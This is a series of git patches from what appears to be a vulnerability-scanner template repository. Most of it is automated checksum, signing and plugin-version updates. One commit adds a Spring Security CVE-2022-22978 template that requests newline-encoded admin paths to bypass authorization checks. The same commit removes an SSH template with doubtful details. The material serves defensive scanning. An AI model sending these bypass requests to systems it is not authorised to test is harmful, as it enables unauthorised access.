'http/technologies/wordpress/plugins/chaty.yaml' - - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' - - 'http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml' - - 'http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml' - - 'http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml' - - 'http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml' - - 'http/vulnerabilities/next-js-cache-poisoning.yaml' - - 'http/vulnerabilities/other/azon-dominator-sqli.yaml' - - 'http/vulnerabilities/other/bagisto-csti.yaml' - - 'http/vulnerabilities/other/crocus-lfi.yaml' - - 'http/vulnerabilities/other/enjoyrmis-sqli.yaml' - - 'http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml' - - 'http/vulnerabilities/other/pingsheng-electronic-sqli.yaml' - - 'http/vulnerabilities/other/sharp-printers-lfi.yaml' - - 'javascript/enumeration/ldap/ldap-metadata.yaml' + - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 97779cf5d1ec5f8a9c7fc0f159082ae2bc0bc492 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 18:15:48 +0000 Subject: [PATCH 1096/1841] Auto Template Signing [Wed Jul 10 18:15:48 UTC 2024] :robot: --- http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml index ee2bd67def..79d754f8ca 100644 --- a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml @@ -48,3 +48,4 @@ http: - "status_code_2 == 200 && contains(all_headers_2, 'X-Middleware-Skip: 1')" - "status_code_3 == 200 && contains(all_headers_3, 'X-Middleware-Skip: 1')" condition: and +# digest: 4a0a00473045022100c4ebdaa33a24364b034d2b90a9fd90d56559a299585b5478e6d28b59310630810220549105fd216b645dc17bc0919359884322924cd407a343e67612dce824e73f3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c3133ef7687e15656e04839bee4b95a1101edcce Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 18:25:38 +0000 Subject: [PATCH 1097/1841] Auto Generated New Template Addition List [Wed Jul 10 18:25:38 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index a2d790ddcc..56a631c95e 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,3 @@ +http/cves/2023/CVE-2023-4220.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml +http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml From 694496aa8743837797a39f98f3638af8aed6bdb2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 18:25:47 +0000 Subject: [PATCH 1098/1841] Auto Generated Templates Checksum [Wed Jul 10 18:25:46 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8d84c7a7cd..6fc3835d0b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7922,7 +7922,8 @@ http/vulnerabilities/netmizer/netmizer-data-listing.yaml:86b5ea2ca47dcb2b20aeff8 http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:850c786f4ac75d6deeefe602a60f94435d7cab07 http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:7ee726ace09d4659b2f3980105a638c57fb0114d http/vulnerabilities/next-js-cache-poisoning.yaml:e0d43aad92facaed305db447f27dec8dc929465a -http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml:b84ccea8bafe2e592ec927fe3fc13348d4881f39 +http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml:3e9d98f1110135883c32e54d0c35f5b619517967 +http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml:fc3e7112468c332c53a2c56432a16e1e9ea7808c http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15 http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3 http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f @@ -8865,7 +8866,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7890ab792f534422afdc4500b1d80803cce74f0b +templates-checksum.txt:cdb65a878c01ab07c3cb30eb6d7f0da32e92d971 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7c872360e0ec80fd13685c07ec95af4814a05eb2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 18:26:32 +0000 Subject: [PATCH 1100/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d92152ac8d..b3ea198a56 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,7 +3,9 @@ on: push: paths: - '.new-additions' + - 'http/cves/2023/CVE-2023-4220.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' + - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From fa919a7fca3628c65d2bdd0aac8b02326f272b8f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 18:27:25 +0000 Subject: [PATCH 1101/1841] Auto Template Signing [Wed Jul 10 18:27:25 UTC 2024] :robot: --- http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml index 6389b4aca4..6b1efba314 100644 --- a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml @@ -48,3 +48,4 @@ http: - "status_code_2 == 200 && contains(content_type_2, 'text/x-component')" - "status_code_3 == 200 && contains(content_type_3, 'text/x-component')" condition: and +# digest: 4a0a0047304502204ed973cfb9843fd79d0b341b5bf2d36a17a5dd10270bb3114b2b3846b9a3fa3c022100a64054e6356d0cca61ed26edaa0fb3625aed1e09512172a1497cc2ad551ad467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 96e02bdc8aff7489cc28c95e9ba95befea837efa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 21:06:13 +0000 Subject: [PATCH 1103/1841] Auto Generated Templates Checksum [Wed Jul 10 21:06:13 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6fc3835d0b..6936b1d38a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3273,6 +3273,7 @@ http/cves/2023/CVE-2023-4173.yaml:7a186ce21f79cc2aaf602f20096b3da265eea94e http/cves/2023/CVE-2023-4174.yaml:6d9b3231d2c766eb63eedeb04b924000b7999e4e http/cves/2023/CVE-2023-41763.yaml:b428682d889984946edc1203e1c240b9c5ae4137 http/cves/2023/CVE-2023-41892.yaml:1e501e0ef2d2102d6c865fe4547501649ec2164c +http/cves/2023/CVE-2023-4220.yaml:37f85450f2c470ce7c25e52facf939eb511460d2 http/cves/2023/CVE-2023-42343.yaml:69a0589c7e96b3ae72a73dc5610cd79f60246440 http/cves/2023/CVE-2023-42344.yaml:674f69182dcf67d59a4a19c9adfc0b2e92fe5645 http/cves/2023/CVE-2023-42442.yaml:5ea1d0998ecaa52c2608185126326ef0ea979314 @@ -7264,7 +7265,7 @@ http/technologies/vmware/vmware-detect.yaml:4f8fbfc3da99dc2f1d4b5294463c24adbd58 http/technologies/vmware/vmware-horizon-version.yaml:86445c8b1d7b19b717cf68e6135f1801214018af http/technologies/vmware/vmware-site-recovery-manager.yaml:206cc779975a1e77b16422af0454f4b370f18a73 http/technologies/vmware/vmware-vrealize-detect.yaml:b284b80bdd27cc66d9c343300bfc273448c724a6 -http/technologies/waf-detect.yaml:1fca6289adeea30092957bb876f80dab36b8ca8d +http/technologies/waf-detect.yaml:0cce0b5669bc9d6874ee987a9c4daed3f801c13a http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d @@ -7923,7 +7924,7 @@ http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:850c786f4ac75d6dee http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:7ee726ace09d4659b2f3980105a638c57fb0114d http/vulnerabilities/next-js-cache-poisoning.yaml:e0d43aad92facaed305db447f27dec8dc929465a http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml:3e9d98f1110135883c32e54d0c35f5b619517967 -http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml:fc3e7112468c332c53a2c56432a16e1e9ea7808c +http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml:ae6ada4c9bb6b978fb03ed63733b079092b6e9a9 http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15 http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3 http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f @@ -8866,7 +8867,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:cdb65a878c01ab07c3cb30eb6d7f0da32e92d971 +templates-checksum.txt:98ad3f9c23c3f08754417333ac80eac604ecda10 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 775e6d0b7d9ec5f13b7e03441fe64516f48d6dba Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 21:08:05 +0000 Subject: [PATCH 1104/1841] Auto Template Signing [Wed Jul 10 21:08:05 UTC 2024] :robot: --- http/cves/2023/CVE-2023-4220.yaml | 1 + http/technologies/waf-detect.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-4220.yaml b/http/cves/2023/CVE-2023-4220.yaml index 4529ba4632..82e8fcd8ab 100644 --- a/http/cves/2023/CVE-2023-4220.yaml +++ b/http/cves/2023/CVE-2023-4220.yaml @@ -55,3 +55,4 @@ http: - 'contains(body_2,"{{md5(num)}}")' - 'status_code_1 == 200 && status_code_2 == 200' condition: and +# digest: 490a0046304402202ba2802508b1a8106520e47642aee8d4b207bacca790fa88de82191931bd865c022022060f23d393a03776c518d9167dcf9508a0a32d8b2e7ff199d1d8a0c670f3f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/waf-detect.yaml b/http/technologies/waf-detect.yaml index 49b870cf3f..b000df1c56 100644 --- a/http/technologies/waf-detect.yaml +++ b/http/technologies/waf-detect.yaml @@ -801,3 +801,4 @@ http: part: header words: - "X-Protected-By: shieldon.io" +# digest: 4a0a00473045022100ff430ca1fdcdc591de91ca07469d95bd84da955a31a67a5f4261ba0918ab93cf02207bd90ded649ea144d20d1c38663a4dd310fe9bc9465e90fdadbf7b922fc1a6c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d4cb08199218747e621100c6dbb05c64f9bc88a4 Mon Sep 17 00:00:00 2001 From: Sumanth Vankineni Date: Wed, 10 Jul 2024 16:33:42 -0700 Subject: [PATCH 1105/1841] Fixed issues for CVE-2022-22978 --- http/cves/2022/CVE-2022-22978.yaml | 55 ++++++++++++++++++++++++++++ network/cves/2024/CVE-2024-6387.yaml | 38 ------------------- 2 files changed, 55 insertions(+), 38 deletions(-) create mode 100644 http/cves/2022/CVE-2022-22978.yaml delete mode 100644 network/cves/2024/CVE-2024-6387.yaml diff --git a/http/cves/2022/CVE-2022-22978.yaml b/http/cves/2022/CVE-2022-22978.yaml new file mode 100644 index 0000000000..1102f7dc24 --- /dev/null +++ b/http/cves/2022/CVE-2022-22978.yaml @@ -0,0 +1,55 @@ +id: CVE-2022-22978 + +info: + name: Spring Security RegexRequestMatcher Authorization Bypass + author: Sumanth Vankineni + severity: critical + description: | + In Spring Security versions prior to 5.4.11, 5.5.7, 5.6.4, and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authorization checks and access restricted endpoints. + remediation: | + Upgrade to Spring Security version 5.4.11, 5.5.7, 5.6.4, or later to mitigate this vulnerability. + reference: + - https://tanzu.vmware.com/security/cve-2022-22978 + - https://github.com/DeEpinGh0st/CVE-2022-22978 + - https://snyk.io/blog/spring-security-authorization-bypass-cve-2022-31692/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22978 + cwe-id: CWE-287 + epss-score: 0.89 + epss-percentile: 0.99 + cpe: cpe:2.3:a:pivotal_software:spring_security:*:*:*:*:*:*:*:* + +http: + - method: GET + path: + - "{{BaseURL}}/admin/%0atest" + - "{{BaseURL}}/admin/%0dtest" + - "{{BaseURL}}/admin/index%0a" + - "{{BaseURL}}/admin/index%0d" + - "{{BaseURL}}/admin/%0aindex" + - "{{BaseURL}}/admin/%0dindex" + - "{{BaseURL}}/admin/%0atest.html" + - "{{BaseURL}}/admin/%0dtest.html" + - "{{BaseURL}}/admin/%0a.jsp" + - "{{BaseURL}}/admin/%0d.jsp" + - "{{BaseURL}}/admin/.%0a" + - "{{BaseURL}}/admin/.%0d" + - "{{BaseURL}}/admin/test/%0a" + - "{{BaseURL}}/admin/test/%0d" + - "{{BaseURL}}/admin/dashboard/%0a" + - "{{BaseURL}}/admin/dashboard/%0d" + - "{{BaseURL}}/admin/config/%0a" + - "{{BaseURL}}/admin/config/%0d" + - "{{BaseURL}}/admin/settings/%0a" + - "{{BaseURL}}/admin/settings/%0d" + - "{{BaseURL}}/admin/secure/%0a" + - "{{BaseURL}}/admin/secure/%0d" + stop-at-first-match: true + matchers: + - type: status + status: + - 200 diff --git a/network/cves/2024/CVE-2024-6387.yaml b/network/cves/2024/CVE-2024-6387.yaml deleted file mode 100644 index 0cbf0d8738..0000000000 --- a/network/cves/2024/CVE-2024-6387.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2024-6387 - -info: - name: regreSSHion - Vulnerable SSH Authentication - author: Sumanth Vankineni - severity: high - description: | - The CVE-2024-6387 describes a vulnerability in the SSH service where malformed authentication requests can lead to unauthorized access. - remediation: Update to the latest version of SSH to mitigate this vulnerability. - reference: - - https://example.com/cve-2024-6387 - - https://nvd.nist.gov/vuln/detail/CVE-2024-6387 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2024-6387 - cwe-id: CWE-287 - epss-score: 0.05 - epss-percentile: 0.95 - cpe: cpe:2.3:a:ssh:ssh:8.5:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: ssh - product: ssh - tags: network,cve2024,cve,ssh,openssh,tcp - -tcp: - - host: - - "{{Hostname}}" - port: 22 - inputs: - - data: "SSH-2.0-ExampleClientStaticTest" - matchers: - - type: regex - regex: - - "SSH-2\\.0-OpenSSH_8\\.[5-9]" - - "SSH-2\\.0-OpenSSH_9\\.[0-7]" - part: data From 064ae930b178ebf68b310e409eb41a3c4288a18e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 00:20:16 +0000 Subject: [PATCH 1106/1841] Auto WordPress Plugins Update [Thu Jul 11 00:20:16 UTC 2024] :robot: --- helpers/wordpress/plugins/akismet.txt | 2 +- helpers/wordpress/plugins/facebook-for-woocommerce.txt | 2 +- helpers/wordpress/plugins/forminator.txt | 2 +- helpers/wordpress/plugins/jetpack-boost.txt | 2 +- helpers/wordpress/plugins/premium-addons-for-elementor.txt | 2 +- helpers/wordpress/plugins/royal-elementor-addons.txt | 2 +- helpers/wordpress/plugins/seo-by-rank-math.txt | 2 +- helpers/wordpress/plugins/sg-cachepress.txt | 2 +- helpers/wordpress/plugins/shortcodes-ultimate.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- helpers/wordpress/plugins/wp-super-cache.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 3 +-- http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - 